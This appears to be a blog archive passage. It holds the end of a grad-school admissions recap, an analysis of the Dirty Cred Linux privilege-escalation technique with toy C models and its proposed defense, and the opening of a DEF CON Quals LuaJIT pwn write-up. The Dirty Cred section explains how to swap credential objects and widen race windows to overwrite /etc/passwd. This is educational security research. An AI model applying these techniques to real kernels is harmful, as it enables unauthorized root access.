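NJU: summer campers may not take part in pre-recommendation, but the pre-recommendation system must still be filled in.
Fudan: most of the quota is in pre-recommendation, but the advisors there still do not match my direction.
ZJU CS / Cyber Security: only 25 academic master's slots in 2021, 13 of them for ZJU's own students; the competition looks extraordinarily fierce.
SJTU: pre-recommendation is essentially for direct PhD applicants and SJTU's own students; outside master's applicants have no chance.
For a direct PhD at SJTU you only need to contact an advisor in advance; it is very easy to get in.
USTC: ~~Cyber Security seems to have no pre-recommendation round~~ I thought it would not open, but it really did open another batch.

At Tsinghua Shenzhen and PKU Shenzhen (PKU ECE) nearly all professors work on big data and AI, so they had no interest in my background (what I do has nothing to do with what they look for), and the only two security-related professors are both listed on 研控网 (you know what that means). Without an advisor, these two schools offer essentially no chance in pre-recommendation, because most slots were handed out in the summer camps (I got into neither, laugh), and even if someone declines I would not be next in line.

The PKU system lets you apply to several schools at once, but each PKU school also handed out almost all of its offers during the summer camps. In pre-recommendation I emailed pkucs advisors relentlessly, hoping that some advisor whose student had backed out would take me in (laugh), but it seems to have had no effect at all. Anyone who wants PKU must take the summer camp stage extremely seriously.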

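That left only a few options for pre-recommendation:

Zhejiang University, CS / School of Cyberspace Security
Fudan University, Department of Computer Science
PKU SSM or CS
Institute for Network Sciences and Cyberspace, Tsinghua University (Tsinghua INSC for short).

First, ZJU. Its bar was sky-high this year, with rejections everywhere. Outside students admitted probably numbered in the double digits, and as far as I know Cyber Security let in only about 50 people (own and outside students combined). I was rejected too, probably because my background is ordinary: I saw someone at my level but with a much better title get in.

Next, Fudan. It opened rather late this year. Broadly, the people admitted in pre-recommendation were the same as in the summer camp: those who got into the camp got in again and those who did not still did not. Once I had the offer from my dream school I dropped Fudan and skipped the rest of its interview process.

Then PKU. SSM and CS both opened pre-recommendation but in practice took nobody: the professors' slots had mostly been claimed during the summer camp, pre-recommendation amounted to recruiting a waiting list, and without an advisor willing to take you there was no chance.

Finally, Tsinghua INSC.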

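Tsinghua INSC was the target I put the most effort into, and it has the advisor I most want to do research with. It was my final goal; every summer camp and pre-recommendation activity before it was a search for a fallback. I contacted the advisor in December last year and interned remotely from the winter break through the spring semester, more than half a year in total. During the internship I wrote code, helped write a paper, reverse-engineered drivers and so on. Research life was fulfilling, and the atmosphere in the group was genuinely good, which made me want to join even more.

A word on the summer camp: it took 50 students, and perhaps because my materials and background fell short, I was not admitted. I later learned that the camp mainly recruits direct PhD students and few master's students, which was some consolation.

75 students reached the pre-recommendation second round, only 25 more than in the summer camp, half from Tsinghua and half from outside. Tsinghua students compete with each other and outside students with each other, and the quota is split evenly. Among outside students there were 12 direct PhD applicants and 25 master's applicants this time. With 10 master's slots for outside students, 10 out of 25 is still some pressure.

INSC shares its coding test with the Department of Computer Science and the Shenzhen graduate school: all three sit the same problems at the same time, so the test is not easy. This round's problems were not very algorithmic, so my three months of grinding on Luogu went completely unused... I still did poorly and only picked up the few giveaway points. Afterwards I was convinced I had bombed, all the more so because the coding test's weight went from 10% to 20% this year, doubling its importance. I later learned that my score was better than I had thought, and hope returned.

I will not go into the interview. The assessment format is published on the institute's website: an 8-minute general interview and a 12-minute technical interview, for anyone interested. One thing to note: when applying to the top 2, polish every document (personal statement, PPT and so on), because the professors really do read them over and over... During the interview I watched a row of professors leafing back and forth through my personal statement and was a little scared that something in it would trip me up...

Finally, thanks to the teachers, classmates and seniors who have supported me all along: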

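V. Declined Offers

A few words on how declined offers played out.

SJTU ipads lab. After the Tsinghua INSC result came out (September 19), I emailed to ask about my waiting-list position. It had moved from sixth to second, and on September 25 the academic secretary phoned with a professional master's slot from the waiting list. SJTU evidently has many declined offers too (and I am about to add one, laugh). SJTU Software also has an industry joint-training program this year, in which engineering master's students likewise spend one year on campus and two in a company.
NJU went all the way down to about 200 on the waiting list on September 28 (I think). Waiting-list candidates interested in NJU were asked to apply in the system directly, and those who had applied were taken before higher-ranked candidates who had not. If slots remained after that, the phone calls started. I was 80th and got a call that day; my roommate, around 200th, exchanged several calls with the NJU admissions office that day and made it in at the last minute (congratulations).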

A Brief Analysis of Dirty Cred, a New Linux Exploitation Technique

2022-10-05T16:00:00.000Z

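I. Introduction

Dirty Cred is a new Linux exploitation technique inspired by the Dirty Pipe vulnerability. Following the Dirty Cred workflow, other memory-corruption bugs in the Linux kernel can be turned into logic bugs during exploitation, which bypasses all current kernel mitigations (including CFI, control-flow integrity).

The core idea of Dirty Cred is to swap a low-privileged credential object with a high-privileged one in order to escalate privileges. The work has been accepted at CCS 2022 and Black Hat USA 2022, and it is a genuinely interesting idea.

II. Background

Some background helps before getting to Dirty Cred itself.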

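1. Dirty Pipe

Dirty Pipe (CVE-2022-0847) is a Linux kernel privilege-escalation vulnerability disclosed earlier in 2022. I analyzed it in the first half of that year in "Linux Dirty Pipe CVE-2022-0847 Vulnerability Analysis" on Kiprey's Blog, so I will not repeat the details here.

A short recap of the root cause:

A pipe is a ring queue whose elements reference the physical pages that hold the data. On a write, if the element at the head of the queue carries the PIPE_BUF_FLAG_CAN_MERGE flag, the new data can be merged into that element's page directly, without creating a new queue element, which saves memory.

Linux has a system call named splice that can append a file's data to a pipe. Under the hood it adds a reference to the file's page-cache page at the head of the pipe queue. Because that page may be in use elsewhere, its queue element must not be marked PIPE_BUF_FLAG_CAN_MERGE; otherwise a later write to the pipe would be merged into the page cache and modify it by mistake.

The root cause of Dirty Pipe is that the flags field of a pipe queue element is left uninitialized. An attacker first uses write to pour a large amount of data into the pipe so that every element in the queue is marked PIPE_BUF_FLAG_CAN_MERGE, then reads it all back to empty the pipe, and finally uses splice to load the page cache of any readable file (for example /etc/passwd) into the pipe. The flags are never reset, so the element that now references the page cache still carries the stale PIPE_BUF_FLAG_CAN_MERGE. A subsequent write then goes straight into the file's page cache, which should never have been modified, so the in-memory contents of a privileged file such as /etc/passwd are tampered with and privileges can be escalated.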
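
The sequence above can be modelled in user space. What follows is a toy sketch in plain C, not kernel code: toy_pipe, toy_write, toy_drain and toy_splice are names made up for this illustration, FLAG_CAN_MERGE merely stands in for PIPE_BUF_FLAG_CAN_MERGE, and the buggy argument models the missing flag initialization.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define RING_SLOTS     4
#define PAGE_BYTES     16
#define FLAG_CAN_MERGE 0x10u   /* stand-in for PIPE_BUF_FLAG_CAN_MERGE */

struct toy_buf { char *page; size_t len; unsigned flags; };

struct toy_pipe {
    struct toy_buf ring[RING_SLOTS];
    char pages[RING_SLOTS][PAGE_BYTES];   /* private pages for write() data */
    unsigned head;                        /* next slot to fill */
    unsigned used;                        /* slots currently holding data */
};

static struct toy_buf *last_buf(struct toy_pipe *p) {
    return p->used ? &p->ring[(p->head + RING_SLOTS - 1) % RING_SLOTS] : NULL;
}

static struct toy_buf *new_slot(struct toy_pipe *p) {
    assert(p->used < RING_SLOTS);
    struct toy_buf *b = &p->ring[p->head];
    p->head = (p->head + 1) % RING_SLOTS;
    p->used++;
    return b;                             /* note: b->flags is NOT cleared here */
}

/* write(): merge into the last buffer if it is flagged, else take a new slot */
void toy_write(struct toy_pipe *p, const char *data, size_t n) {
    struct toy_buf *b = last_buf(p);
    if (b && (b->flags & FLAG_CAN_MERGE) && b->len + n <= PAGE_BYTES) {
        memcpy(b->page + b->len, data, n);
        b->len += n;
        return;
    }
    assert(n <= PAGE_BYTES);
    b = new_slot(p);
    b->page = p->pages[b - p->ring];
    b->len = n;
    b->flags = FLAG_CAN_MERGE;
    memcpy(b->page, data, n);
}

/* read() everything: the data is consumed, the stale flags stay behind */
void toy_drain(struct toy_pipe *p) {
    p->used = 0;
}

/* splice(): reference a page-cache page; the fixed variant resets the flags */
void toy_splice(struct toy_pipe *p, char *page_cache, size_t len, int buggy) {
    struct toy_buf *b = new_slot(p);
    b->page = page_cache;
    b->len = len;
    if (!buggy)
        b->flags = 0;
}
```

Filling every slot with toy_write, draining, calling toy_splice with buggy set and then writing again makes the last write land inside the "page cache" buffer; with buggy cleared, the same write goes to a private page instead.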

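Interestingly, the whole exploit never has to deal with any mitigation. Dirty Pipe is a pure logic bug, and logic bugs of this kind bypass mitigations entirely and allow privilege escalation. On the other hand, Dirty Pipe depends heavily on what the pipe itself can do (the ability to inject data into an arbitrary file through a pipe). In other words, because a logic bug comes from confused logic, its exploitation is tightly bound to the logic of that one component. That tight coupling makes the bug easy to defend against, and its impact is not especially broad.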

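2. Credentials

Linux credentials are usually understood as the kernel objects that carry privilege information. Two kinds matter here (there are more than two in total):

struct cred: holds the privilege information of a task, such as its GID and UID. If we could arbitrarily modify the cred structure of a low-privileged process, we could raise that process to high privilege (for example root).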

// include\linux\cred.h
struct cred {
 atomic_t    usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
 atomic_t    subscribers;    /* number of processes subscribed */
 void        *put_addr;
 unsigned    magic;
#define CRED_MAGIC   0x43736564
#define CRED_MAGIC_DEAD  0x44656144
#endif
 kuid_t      uid;        /* real UID of the task */
 kgid_t      gid;        /* real GID of the task */
 kuid_t      suid;       /* saved UID of the task */
 kgid_t      sgid;       /* saved GID of the task */
 kuid_t      euid;       /* effective UID of the task */
 kgid_t      egid;       /* effective GID of the task */
 kuid_t      fsuid;      /* UID for VFS ops */
 kgid_t      fsgid;      /* GID for VFS ops */
 unsigned    securebits; /* SUID-less security management */
 kernel_cap_t    cap_inheritable; /* caps our children can inherit */
 kernel_cap_t    cap_permitted;   /* caps we're permitted */
 kernel_cap_t    cap_effective;   /* caps we can actually use */
 kernel_cap_t    cap_bset;        /* capability bounding set */
 kernel_cap_t    cap_ambient;     /* Ambient capability set */
    ...
}

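struct file: holds part of a file's permission information, such as read and write access. If a low-privileged user can arbitrarily modify a high-privileged file (for example /etc/passwd), that also leads to privilege escalation.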

// include\linux\fs.h
struct file {
 ...
 struct path    f_path;
 struct inode        *f_inode;   /* cached value */
 const struct file_operations    *f_op;

 /*
  * Protects f_ep_links, f_flags.
  * Must not be taken from IRQ context.
  */
 spinlock_t          f_lock;
 enum rw_hint        f_write_hint;
 atomic_long_t       f_count;
 unsigned int        f_flags;
 fmode_t             f_mode;           // !!: O_RDWR
 struct mutex        f_pos_lock;
 loff_t              f_pos;
 struct fown_struct  f_owner;
 const struct cred   *f_cred;      // !!: cred
 struct file_ra_state   f_ra;
 ...
}

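Note that struct file only describes files that have already been opened. If a file cannot even be opened, no struct file exists for it.

Other privilege information such as the file's owner is stored in struct inode and is not covered here.

3. Allocator

The Linux kernel mainly allocates memory through the slab allocator, which maintains two kinds of caches (think of them as two allocation paths with different purposes):

dedicated cache: serves frequently used kernel objects. Structures in such a cache are kept in an initialized state to speed up allocation.
generic cache: general-purpose caches. In most cases the chunk sizes are powers of two.

Credential objects such as cred and file are allocated from dedicated caches, whereas most memory-corruption bugs occur in generic caches.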
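
To make the generic-cache size classes concrete, here is a small sketch that maps a requested size to the kmalloc-N cache that would serve it. The class list is an assumption: it mirrors the kmalloc-* entries commonly seen in /proc/slabinfo on x86-64 (including the two non-power-of-two classes 96 and 192), and the real set depends on the kernel configuration. toy_kmalloc_class is a made-up name.

```c
#include <assert.h>
#include <stddef.h>

/* Assumed kmalloc-N size classes (typical x86-64 /proc/slabinfo listing). */
static const size_t toy_classes[] = {
    8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
};

/* Return the object size of the generic cache that would serve `size`,
 * or 0 if the request is larger than the biggest class modelled here. */
size_t toy_kmalloc_class(size_t size) {
    assert(size > 0);
    for (size_t i = 0; i < sizeof toy_classes / sizeof toy_classes[0]; i++)
        if (size <= toy_classes[i])
            return toy_classes[i];
    return 0;
}
```

Two objects of different types share a generic cache whenever they fall into the same class, which is why bugs in generic caches have many candidate victim objects, while a dedicated cache only ever holds one type.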

Run sudo cat /proc/slabinfo in a terminal to inspect the slab allocator. The entries with distinct names are dedicated caches:

The entries whose names contain kmalloc are generic caches:

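III. Threat Model

Attacker
- A low-privileged user has access to the target Linux system
- A heap memory-corruption vulnerability already exists
- The attacker intends to use it for local privilege escalation
- Any help that hardware could give the exploit is out of scope
Target platform
- All mitigations are enabled (for example KASLR, SMAP, SMEP, CFI, KPTI)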

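IV. Challenges

A brief look at CVE-2021-4154 shows how Dirty Cred is used. A figure first:

The figure already gives the rough idea. The short version: writing to a file runs two steps in order:

Check the file permission (is it writable?)
Actually write the data to the file

Suppose we race between these two steps: after the permission check succeeds (/tmp/x is writable), we trigger the vulnerability to free the original credential structure (here a file structure) and then create a high-privileged credential structure (for example the file structure of /etc/passwd) to fill the freed slot. The pending data is then written to /etc/passwd, which yields local privilege escalation.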
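
The check-then-use gap described above can be shown with a toy model. This is only a user-space sketch under stated assumptions: struct toy_file is a stand-in for struct file, the race hook stands in for "free the object and let a privileged one reuse the slot", and none of the names below exist in the kernel.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

struct toy_file {
    const char *path;
    int writable;          /* models FMODE_WRITE in f_mode */
    char data[32];         /* models the file contents */
};

typedef void (*toy_race_hook)(struct toy_file *slot);

/* Step 1 checks the permission, step 2 writes. The hook runs in between,
 * which is exactly the window the attacker tries to win. */
int toy_checked_write(struct toy_file *f, const char *buf, toy_race_hook hook) {
    if (!f->writable)
        return -1;                         /* permission check fails */
    if (hook)
        hook(f);                           /* race window */
    strncpy(f->data, buf, sizeof f->data - 1);
    f->data[sizeof f->data - 1] = '\0';    /* write uses f without re-checking */
    return 0;
}

/* Models the slot being freed and reused by a read-only /etc/passwd file. */
void toy_swap_in_privileged(struct toy_file *slot) {
    slot->path = "/etc/passwd";
    slot->writable = 0;
    strcpy(slot->data, "root:x:0:0");
}
```

Called without a hook on a read-only file the write is refused; called on a writable /tmp/x with toy_swap_in_privileged as the hook, the data ends up in the object that now describes /etc/passwd even though that object is not writable.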

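The challenges Dirty Cred faces follow from this:

How to turn a memory-corruption bug into a primitive that can swap credential objects.
How to widen the race window between the permission check and the data write.
How to create a high-privileged credential object to occupy the slot of the freed low-privileged one.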

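V. Swapping Credential Objects

Common kinds of memory-corruption bugs:

Invalid write: out-of-bounds write (an out-of-bounds read only leaks data and cannot be used here) and use-after-free.
Invalid free: double free.

The following subsections show how each of these can be used to replace an unprivileged credential with a privileged one.

1. Out Of Bound Write

The short version is in the figure:

This is the usual OOB-write pattern: write past the end of the vulnerable object into a field of the next structure, so that its pointer to a low-privileged credential structure ends up pointing at a high-privileged one. The pointer is redirected by writing zeros into its two low bytes (0x0000). Two zero bytes are used because the attacker wants the pointer to land on the privileged credential at the start of a page, and the attacker can create privileged credentials in bulk so that they occupy the first slot of fresh pages in preparation for the overwrite.
Pages are aligned to 0x1000 bytes, but zeroing two bytes requires the privileged credential to sit at an address aligned to 0x10000 bytes, so the attempt succeeds with a probability of about 1/16 and may need to be repeated.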
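
The 1/16 figure is plain alignment arithmetic, sketched below. The helper names and the sample address are made up for illustration; only the two alignment constants come from the text above.

```c
#include <assert.h>
#include <stdint.h>

#define TOY_PAGE_SIZE UINT64_C(0x1000)    /* pages are 4 KiB aligned */
#define TOY_ALIGN_64K UINT64_C(0x10000)   /* result of zeroing two bytes */

/* Effect of the OOB write: the two low bytes of the pointer become zero. */
uint64_t zero_low16(uint64_t ptr) {
    return ptr & ~(TOY_ALIGN_64K - 1);
}

/* Count how many of n consecutive pages starting at `base` begin on a
 * 64 KiB boundary, i.e. could be hit by a pointer with zeroed low bytes. */
unsigned count_64k_aligned_pages(uint64_t base, unsigned n) {
    assert(base % TOY_PAGE_SIZE == 0);
    unsigned hits = 0;
    for (unsigned i = 0; i < n; i++)
        if ((base + i * TOY_PAGE_SIZE) % TOY_ALIGN_64K == 0)
            hits++;
    return hits;
}
```

Any window of 16 consecutive pages contains exactly one page that starts on a 64 KiB boundary, so if privileged credentials sit at the start of arbitrary pages, roughly one attempt in sixteen lands on one.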

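2. Use After Free

The UAF case is close to the CVE-2021-4154 flow described above.

If the UAF is in a credential dedicated cache, simply free the original unprivileged credential and let a newly created privileged credential object take the freed slot; the swap is done.
If the UAF is in a generic cache (the common case), the UAF must provide an invalid-write capability: free the object to open a hole, occupy the hole with an exploitable object that contains a credential pointer, then overwrite that credential pointer through the dangling UAF pointer.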

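3. Double Free

Exploiting a double free is a bit more involved. The figure first:

The rough flow:

Allocate a large number of objects in the cache that holds the vulnerable object, such that
1. the moment each of these objects is freed is under our control
2. "a large number" means at least one full page of memory.
The only purpose is to control when a memory page gets recycled: once every object on a page is freed, the empty page is returned to the page allocator.
Trigger the double-free vulnerability twice, so that one freed chunk ends up with two dangling pointers.
Free every object on the page of the vulnerable object, so that the page is recycled by the allocator and reused for credential allocation (that is, it becomes part of a dedicated cache).
Allocate many credential structures on this page, which now belongs to the credential dedicated cache, to fill it (Figure 3(f)).
The two dangling pointers may not be aligned with a credential object, so one of them is spent to free a credential-object-sized hole.
Allocate a new credential object to fill this hole. Now two pointers refer to the same credential object, and the rest of the exploit follows the UAF approach, which is not repeated here.

An interesting question arises here: if a pointer originally pointed into a generic cache and the memory it points to has since become part of a dedicated cache, how is the size determined when this pointer (believed to be a generic pointer but really a dedicated one) is freed? Why is the freed size that of a credential object?

Reading the kfree logic of the slab allocator shows that freeing is driven by the address being freed. kfree first looks up the slab_cache structure that owns the address and then frees an object of the size recorded there. In other words, an address inside a generic cache follows the generic-cache free path and an address inside a dedicated cache follows the dedicated-cache path. Presumably this is for usability, so that chunks from different caches can be released through the same kfree interface.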
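
The point that the freed size is derived from the address, not from the pointer's history, can be illustrated with a toy lookup table. This is a simplified model and an assumption about structure only: the real kernel finds the owning cache through the page (or folio) metadata of the address, and the cache names and object sizes used in the usage note are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define TOY_PAGE   4096u
#define TOY_NPAGES 4u

struct toy_cache { const char *name; size_t object_size; };

/* Per-page owner, standing in for the page metadata the kernel consults. */
static const struct toy_cache *toy_page_owner[TOY_NPAGES];

void toy_assign_page(size_t page, const struct toy_cache *cache) {
    assert(page < TOY_NPAGES);
    toy_page_owner[page] = cache;
}

/* Size of the object that a free of `addr` would release. The caller's
 * idea of what the pointer used to be plays no role. */
size_t toy_kfree_size(uintptr_t addr) {
    size_t page = addr / TOY_PAGE;
    assert(page < TOY_NPAGES && toy_page_owner[page] != NULL);
    return toy_page_owner[page]->object_size;
}
```

If page 1 belongs to a kmalloc-256 cache, freeing an address on it releases 256 bytes; once the page has been recycled into a credential cache, freeing the very same dangling address releases one credential-sized object instead.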

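VI. Widening the Race Window

Dirty Cred has to replace the low-privileged credential with a high-privileged one between the write-permission check and the actual data write. The replacement takes some time, so the wider the race window, the more reliable the exploit.

1. Two useful mechanisms

Two mechanisms are worth introducing first, userfaultfd and FUSE. Both let a user stretch the race window for as long as they like.

a. Userfaultfd

In a multi-threaded program, userfaultfd lets one thread handle the page faults raised by other threads. When a thread triggers a page fault it is put to sleep immediately, and another thread can read the page-fault event through userfaultfd and handle it.

Userfaultfd is a staple of race-condition exploits. Sadly, to curb its abuse in kernel exploitation, unprivileged userfaultfd has been disabled by default since kernel 5.11 (LWN: Blocking userfaultfd() kernel-fault handling).

Reference: the Linux manual page (man userfaultfd).

b. FUSE

FUSE is a userspace filesystem framework that lets users implement their own filesystems. A user registers handlers that respond to file operation requests, so a handler can stall the kernel just before the file is actually accessed and stretch the window as far as needed.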

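2. Exploiting userfaultfd

Before Linux 4.13, the writev system call was implemented roughly as follows:

After the permission check completes, an attacker can trigger a page fault in the import_iovec call and use userfaultfd to pause kernel execution.

From Linux 4.13 on, the implementation changed as shown below; the import_iovec call was moved earlier:

This breaks the approach above, so a different one is needed.

Linux filesystems are layered: high-level interfaces call lower-level functions. Any file write therefore ends up in a function named generic_perform_write, which deliberately triggers a page fault, and userfaultfd can be used there as well:

3. Exploiting the filesystem lock

Taking ext4 writes as an example, the inode must be locked (the inode_lock(inode) call) before generic_perform_write performs the actual write:

If one process starts writing a huge amount of data to a file, another process writing to the same file waits until the inode lock is released. Tests show that writing 4 GB can keep the second process waiting for tens of seconds (depending on disk performance), so the inode lock can also widen the race window.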

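VII. Allocating Privileged Objects

Dirty Cred depends on controlling when privileged credential objects are allocated, which makes this allocation a key step.

From user space there are two ways to allocate privileged credentials:

Run Set-UID programs (for example sudo) in bulk, or keep spawning privileged daemons (for example sshd), to create privileged cred structures.
Open privileged files such as /etc/passwd read-only.

In kernel space, when the kernel creates a new kernel thread, the current kernel thread is duplicated and its privileged cred structure is copied along with it. So any reliable way to spawn kernel threads gives Dirty Cred a reliable way to create privileged cred structures. Two approaches work:

Fill the kernel workqueue with many work items so that new kernel threads are created dynamically to run them.

Invoke the usermode helper (a mechanism that lets the kernel create user-mode processes); its most common use is loading kernel modules into kernel space.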

// kernel\kmod.c
static int call_modprobe(char *module_name, int wait)
{
 struct subprocess_info *info;
 static char *envp[] = {
     "HOME=/",
     "TERM=linux",
     "PATH=/sbin:/usr/sbin:/bin:/usr/bin",
     NULL
 };

 char **argv = kmalloc(sizeof(char *[5]), GFP_KERNEL);
 if (!argv)
     goto out;

 module_name = kstrdup(module_name, GFP_KERNEL);
 if (!module_name)
     goto free_argv;

 argv[0] = modprobe_path;
 argv[1] = "-q";
 argv[2] = "--";
 argv[3] = module_name;  /* check free_modprobe_argv() */
 argv[4] = NULL;

 // Invoke the usermode helper
 info = call_usermodehelper_setup(modprobe_path, argv, envp, GFP_KERNEL,
                NULL, free_modprobe_argv, NULL);
 if (!info)
     goto free_module_name;

 return call_usermodehelper_exec(info, wait | UMH_KILLABLE);

free_module_name:
 kfree(module_name);
free_argv:
 kfree(argv);
out:
 return -ENOMEM;
}

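When loading a kernel module, the kernel has to run the modprobe program from kernel context to look for the requested driver in the standard driver installation paths.

VIII. Evaluation

1. Environment

Linux 5.16.15

2. Exploitable kernel objects

An object qualifies if it contains a credential object and the timing of its allocation on the kernel heap can be controlled.

The figure above shows that:

Almost every generic cache has at least two exploitable objects
The offset of the credential inside exploitable objects varies widely, which raises Dirty Cred's success rate
This matters most for OOB bugs, whose overwritable offset can vary a lot.
Five exploitable objects hold the credential at offset 0, which raises the success rate when only a small range of memory can be corrupted.

3. CVEs that meet the evaluation criteria

Criteria:

Linux kernel vulnerabilities reported in 2019 or later
Able to corrupt the Linux heap
No special hardware required to trigger
The corresponding kernel panic can be reproduced

The figure above shows that, with all mitigations enabled, Dirty Cred succeeds on 16 of 24 vulnerabilities. In detail:

All double-free bugs can be exploited
Some OOB cases cannot. In some of them the OOB write happens in virtual memory rather than kmalloc'ed memory, where no exploitable object is available yet.
Some UAF cases cannot: some only allow a UAF read with no invalid write, and others allow an invalid write but not at the credential field of an exploitable object.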

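IX. Defending Against Dirty Cred

The key reason Dirty Cred works: kernel memory isolation is based on object type, not on privilege.

The defense is simple in principle: isolate privileged credentials from unprivileged ones.

How: use vzalloc/kvfree to allocate and free privileged credentials in virtual memory, so that privileged and unprivileged objects live in separate memory regions.

Virtual memory is used for privileged credentials because:

With two different kmalloc'ed memory caches, the kernel's page reuse could still merge the pages holding privileged credentials with those holding unprivileged ones, which would defeat the isolation.
The vmalloc area is dynamically allocated, virtually contiguous kernel memory that resides between VMALLOC_START and VMALLOC_END, so it never overlaps the direct-mapped region.

A quick aside on kmalloc versus vmalloc:
Both allocate kernel memory
kmalloc guarantees physically contiguous memory; vmalloc guarantees only virtually contiguous memory (and has to set up page tables)
kmalloc is limited in how much it can allocate; vmalloc can allocate comparatively large regions
vmalloc is slower because it has to set up page tables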
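
The non-overlap argument can be checked with a couple of range tests. The constants below are assumptions: they are the x86-64 values for 4-level paging without KASLR as listed in the kernel's x86_64 memory-map documentation, and other architectures, 5-level paging or randomized layouts use different numbers. The TOY_ names and helpers are made up for this sketch.

```c
#include <assert.h>
#include <stdint.h>

/* Assumed layout: x86-64, 4-level paging, KASLR disabled. */
#define TOY_DIRECT_MAP_START UINT64_C(0xffff888000000000)
#define TOY_DIRECT_MAP_END   UINT64_C(0xffffc87fffffffff)
#define TOY_VMALLOC_START    UINT64_C(0xffffc90000000000)
#define TOY_VMALLOC_END      UINT64_C(0xffffe8ffffffffff)

/* kmalloc'ed slab memory lives in the direct mapping of physical memory. */
int toy_is_direct_map_addr(uint64_t addr) {
    return addr >= TOY_DIRECT_MAP_START && addr <= TOY_DIRECT_MAP_END;
}

/* vmalloc/vzalloc memory lives in its own virtual range. */
int toy_is_vmalloc_addr(uint64_t addr) {
    return addr >= TOY_VMALLOC_START && addr <= TOY_VMALLOC_END;
}

/* The two ranges are disjoint, which is what the isolation relies on. */
int toy_ranges_disjoint(void) {
    return TOY_DIRECT_MAP_END < TOY_VMALLOC_START;
}
```

Because the ranges are disjoint, no amount of page recycling inside the slab allocator can place an unprivileged slab object at an address that a vmalloc'ed privileged credential occupies.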

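The credential structures to isolate are:

struct cred whose UID is GLOBAL_ROOT_UID (privileged credentials)
struct file opened with write access (unprivileged credentials)

My guess at why these two are chosen: structures of these kinds (GLOBAL_ROOT_UID or writable file) are created less often than the others (non-root UIDs or read-only file structures).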
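
The placement rule above boils down to two predicates, sketched here. This is not the patch from the paper: toy_region_for_cred and toy_region_for_file are hypothetical helpers, TOY_FMODE_WRITE mirrors the value of FMODE_WRITE (0x2) in include/linux/fs.h, and uid 0 stands in for GLOBAL_ROOT_UID.

```c
#include <assert.h>

#define TOY_FMODE_WRITE 0x2u   /* same value as FMODE_WRITE */
#define TOY_ROOT_UID    0u     /* uid wrapped by GLOBAL_ROOT_UID */

enum toy_region { TOY_REGION_SLAB, TOY_REGION_VMALLOC };

/* cred objects: root creds go to the vmalloc area, everything else stays
 * in the ordinary dedicated slab cache. */
enum toy_region toy_region_for_cred(unsigned uid) {
    return uid == TOY_ROOT_UID ? TOY_REGION_VMALLOC : TOY_REGION_SLAB;
}

/* file objects: files opened with write access go to the vmalloc area,
 * read-only files stay in the slab cache. */
enum toy_region toy_region_for_file(unsigned f_mode) {
    return (f_mode & TOY_FMODE_WRITE) ? TOY_REGION_VMALLOC : TOY_REGION_SLAB;
}
```

With this split, a writable /tmp/x and a read-only /etc/passwd can never occupy the same slot, and neither can a root cred and a normal user's cred.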

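The isolation is decided when a credential is created, so if an unprivileged cred is promoted in place (for example through setuid/cap_setuid) the isolation becomes meaningless. One countermeasure is to allocate a new privileged cred in the vmalloc area whenever alter_cred_subscribers runs, instead of modifying the original cred. This depends on how Linux evolves, though: if a new way of modifying a cred in place is ever added, the defense stops working, so it is left as future work.

Performance evaluation of the defense:

Most overheads are very small (< 3%) and do not affect normal use. The 10k File Create benchmark, however, shows about 7% overhead, because vmalloc is much slower than kmalloc (it has to set up new mappings, among other things). 10k File Delete costs less because the kernel deletes files asynchronously through RCU to keep execution fast.

RCU (read-copy update) is a data synchronization mechanism in the Linux kernel.

The results also show some "slight performance improvements". These are experimental noise rather than real improvements (even though the benchmarks were repeated several times).

X. References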

Defcon-30-Quals smuggler's cove Post-mortem Notes

2022-08-29T16:00:00.000Z

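I. Introduction

These are my post-mortem notes on smuggler's cove from Defcon 30 Quals.

The challenge is a LuaJIT pwn challenge.

II. Environment Setup

First, get the version number from the provided libluajit file:

Then download the source, check out that version, and build: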

# Download the source
git clone git@github.com:LuaJIT/LuaJIT.git
# Enter the LuaJIT directory
cd LuaJIT
# Check out the matching version
git checkout v2.1.0-beta3
# Manually edit LuaJIT/src/Makefile so that the build includes debug info
# Build
make -j `nproc`
# Leave the LuaJIT directory
cd ..
# Build cove and link against the freshly built libluajit.so
gcc cove.c -g3 -ggdb3 -o mycove -I LuaJIT/src -L ./LuaJIT/src/ -l luajit
# Give the built libluajit the name the loader looks for
ln -s /root/cove/LuaJIT/src/libluajit.so /root/cove/LuaJIT/src/libluajit-5.1.so.2
# Run with the library path set
LD_LIBRARY_PATH=/root/cove/LuaJIT/src ./mycove

# To run the provided binary itself, use the following command
LD_LIBRARY_PATH=. ./cove exp.lua

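III. The Vulnerability

The challenge ships two source files. The first, dig_up_the_loot.c, builds the executable that hands out the flag; the flag is printed only when the binary is run with specific arguments:

The second is cove.c, the main source file that calls into the LuaJIT library. It does roughly the following:

Reads a Lua file whose size must not exceed 433 bytes.

Configures LuaJIT and hides the jit global so that the user cannot set or modify JIT options directly: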

void set_jit_settings(lua_State* L) {
    luaL_dostring(L,
        "jit.opt.start('3');"
        "jit.opt.start('hotloop=1');"
    );
}

void init_lua(lua_State* L) {
    // Init JIT lib
    lua_pushcfunction(L, luaopen_jit);
    lua_pushstring(L, LUA_JITLIBNAME);
    lua_call(L, 1, 0);
    set_jit_settings(L);

    //set jit = nil;
    lua_pushnil(L);
    lua_setglobal(L, "jit");
    lua_pop(L, 1);
    ...

int print(lua_State* L) {
    if (lua_gettop(L) < 1) {
        return luaL_error(L, "expecting at least 1 arguments");
    }
    const char* s = lua_tostring(L, 1);
    puts(s);
    return 0;
}

The most important part: it registers the Lua function cargo, which is backed by the C function debug_jit.

GCtrace* getTrace(lua_State* L, uint8_t index) {
    jit_State* js = L2J(L);
    if (index >= js->sizetrace)
        return NULL;
    return (GCtrace*)gcref(js->trace[index]);
}

int debug_jit(lua_State* L) {
    if (lua_gettop(L) != 2) {
        return luaL_error(L, "expecting exactly 1 arguments");
    }
    luaL_checktype(L, 1, LUA_TFUNCTION);

    const GCfunc* v = lua_topointer(L, 1);
    if (!isluafunc(v)) {
        return luaL_error(L, "expecting lua function");
    }

    uint8_t offset = lua_tointeger(L, 2);
    uint8_t* bytecode = mref(v->l.pc, void);

    uint8_t op = bytecode[0];
    uint8_t index = bytecode[2];

    GCtrace* t = getTrace(L, index);

    if (!t || !t->mcode || !t->szmcode) {
        return luaL_error(L, "Blimey! There is no cargo in this ship!");
    }

    printf("INSPECTION: This ship's JIT cargo was found to be %p\n", t->mcode);

    if (offset != 0) {
        if (offset >= t->szmcode - 1) {
            return luaL_error(L, "Avast! Offset too large!");
        }

        t->mcode += offset;
        t->szmcode -= offset;

        printf("... yarr let ye apply a secret offset, cargo is now %p ...\n", t->mcode);
    }

    return 0;
}

